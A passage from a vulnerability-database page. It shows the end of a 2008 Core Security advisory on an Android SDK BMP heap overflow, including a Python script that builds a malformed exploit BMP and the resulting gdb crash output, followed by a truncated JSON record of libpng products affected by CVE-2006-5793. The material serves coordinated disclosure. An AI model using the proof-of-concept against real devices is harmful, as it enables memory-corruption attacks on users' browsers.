We can see that the heap is located in the range '0000a000-00c73000' and it is executable. Overwriting this area will allow to redirect execution flow if there is a virtual table stored in the heap. Later on the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object .text:0002EB68 MOV R0, R8 .text:0002EB6C MOV LR, PC .text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10 - -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill the heap with the white color ' 0x00ffffff' we can load the Program Counter with the value at '0xffffff+0x10'. The following python script will generate a BMP to accomplish that:
/-----------
This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
Alfredo Ortega - Core Security
import struct
offset = 0xffef0000 width = 0x0bffff height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" bmp+=struct.pack("<I",offset) bmp+="\x28\x00\x00\x00" bmp+=struct.pack("<I",width) bmp+=struct.pack("<I",height) bmp+="\x03\x00\x08\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff" bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41" bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" open("badbmp.bmp","wb").write(bmp) - -----------/
Opening the BMP file generated with this script inside a HTML page will cause (sometimes, as it is dependent on an uninitialized variable) the following output of the gdb debugger:
/-----------
(gdb) attach 1574 attach 1574 Attaching to program: /system/bin/app_process, process 1574 ... 0xafe0d204 in __futex_wait () from /system/lib/libc.so (gdb) c Continuing.
Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () (gdb) - -----------/
Here the browser process has jumped to the '0x00000000' address because that is the value at 0x00ffffff+0x10. We can change this value using common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff' it is very slow and the default memory configuration of Android will often abort the process before reaching the desired point. To overcome this limitation for demonstration purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work.
This security bug affects Android SDK m5-rc14 and earlier versions.
Report Timeline
. 2008-01-30: Vendor is notified that possibly exploitable vulnerabilities where discovered and that an advisory draft is available. This affects Android SDK m3-rc37a and earlier versions. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for the open source community, but agree they can fix the problem on the estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification. 2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been re-=scheduled for February 27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon, priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests for any additional comments or statements to be provided by noon March 3rd, 2008 (UTC-5) . 2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user which decreases the severity of the issues found . 2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges . 2008-03-04: Advisory CORE-2008-0124 is published.
References
[1] Android Overview - Open Handset Alliance - http://www.openhandsetalliance.com/android_overview.html [2] "Android Comes to Life in Barcelona" - The Washington Post , February 11th, 2008 - http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html [3] Android Developer Challenge - http://code.google.com/android/adc.html [4] "Test Center Preview: Inside Google's Mobile future" - Inforworld, Feb. 27th 2008 - http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html [5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th, 2008 http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html [6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. Wiley; 2nd edition (August 20, 2007) - http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html [7] Graphics Interchange Format version 89a - http://www.w3.org/Graphics/GIF/spec-gif89a.txt [8] Android downloads page http://code.google.com/p/android/downloads/list [9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/ [10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
GPG/PGP Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I teV3ahcSAUFEtsaRCeXVuN8= =u35s -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-200611-0210", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.7rc1" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.5" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.7" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.3" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.8" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.6" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.12" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.11" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.9" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.10" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.6" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.4" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.0" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.8" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.7" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.2" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.9" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.1" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.0.6 to 1.2.12 versions up to" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.5.2" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.5.2" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "2.0" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "2.1" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "3.0" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "3.0 (x86-64)" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "4.0" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "4.0 (x86-64)" }, { "model": "turbolinux", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10_f" }, { "model": "turbolinux appliance server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "1.0 (hosting)" }, { "model": "turbolinux appliance server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "1.0 (workgroup)" }, { "model": "turbolinux appliance server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "2.0" }, { "model": "turbolinux desktop", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10" }, { "model": "turbolinux fuji", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "turbolinux multimedia", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "turbolinux personal", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "turbolinux server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10" }, { "model": "turbolinux server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10 (x64)" }, { "model": "turbolinux server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "8" }, { "model": "wizpy", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "home", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1 (as)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1 (es)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1 (ws)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3 (as)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3 (es)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3 (ws)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4 (as)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4 (es)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4 (ws)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5 (server)" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5.0 (client)" }, { "model": "linux advanced workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1" }, { "model": "rhel desktop workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5 (client)" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.2" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2007.0" }, { "model": "enterprise linux virtualization server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux desktop", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "1.0" }, { "model": "libpng3", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.2.12" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "multi network firewall", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "2.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0x86" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "10.0" }, { "model": "libpng3", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.2.11" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "rpath", "version": "1" }, { "model": "enterprise linux es ia64", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "corporate server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "9.0" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2006.0" }, { "model": "android software development kit m3-rc37a", "scope": null, "trust": 0.3, "vendor": "google", "version": null }, { "model": "ccs", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "libpng", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.0.18" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "open-enterprise-server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "personal", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "appliance server hosting edition", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "1.0" }, { "model": "unitedlinux", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "1.0" }, { "model": "ccs", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.1" }, { "model": "hat enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "2.1" }, { "model": "desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4.0" }, { "model": "fuji", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "stable", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "libpng3", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.2.10" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "11.0" }, { "model": "hat enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "operating system enterprise server", "scope": "eq", "trust": 0.3, "vendor": "trustix", "version": "2.0" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "android software development kit m5-rc15", "scope": "ne", "trust": 0.3, "vendor": "google", "version": null }, { "model": "messaging storage server mm3.0", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "enterprise linux hardware certification", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3" }, { "model": "messaging storage server", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "advanced workstation for the itanium processor ia64", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "hat enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3" }, { "model": "hat enterprise linux as ia64", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "2.1" }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "appliance server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "2.0" }, { "model": "ccs", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "secure linux", "scope": "eq", "trust": 0.3, "vendor": "trustix", "version": "2.2" }, { "model": "e1.0-solid", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "linux professional oss", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "8.1" }, { "model": "home", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "fuji", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "0" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "hat fedora core6", "scope": null, "trust": 0.3, "vendor": "red", "version": null }, { "model": "hat enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "8" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2007.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.5.2" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "secure linux", "scope": "eq", "trust": 0.3, "vendor": "trustix", "version": "3.0" }, { "model": "suse linux retail solution", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.0" }, { "model": "linux personal oss", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.0" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "corporate server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "3.0" }, { "model": "message networking", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "9.1" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.2" }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "corporate server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "4.0" }, { "model": "appliance server workgroup edition", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "10.1" }, { "model": "messaging storage server mss", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "10.2" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "suse linux standard server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.0" }, { "model": "desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3.0" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.1" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "desktop", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0" }, { "model": "ses", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "advanced workstation for the itanium processor", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "f...", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10" }, { "model": "ses", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.1" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2006.0" }, { "model": "message networking mn", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1" }, { "model": "enterprise linux ws ia64", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.3" }, { "model": "broker ftp server", "scope": "eq", "trust": 0.3, "vendor": "transsoft", "version": "8.0" }, { "model": "propack sp6", "scope": "eq", "trust": 0.3, "vendor": "sgi", "version": "3.0" }, { "model": "novell linux desktop", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "suse linux school server for i386", "scope": null, "trust": 0.3, "vendor": "s u s e", "version": null }, { "model": "multimedia", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "current", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "hat fedora core5", "scope": null, "trust": 0.3, "vendor": "red", "version": null }, { "model": "hat enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "2-stable-20061018", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "enterprise linux desktop multi os client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "ses", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "corporate server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "3.0" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "suse linux openexchange server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "4.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.5.2" }, { "model": "server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0.0x64" }, { "model": "communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.1" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "hat enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "4" }, { "model": "hat enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "3" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "enterprise linux optional productivity application server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" } ], "sources": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 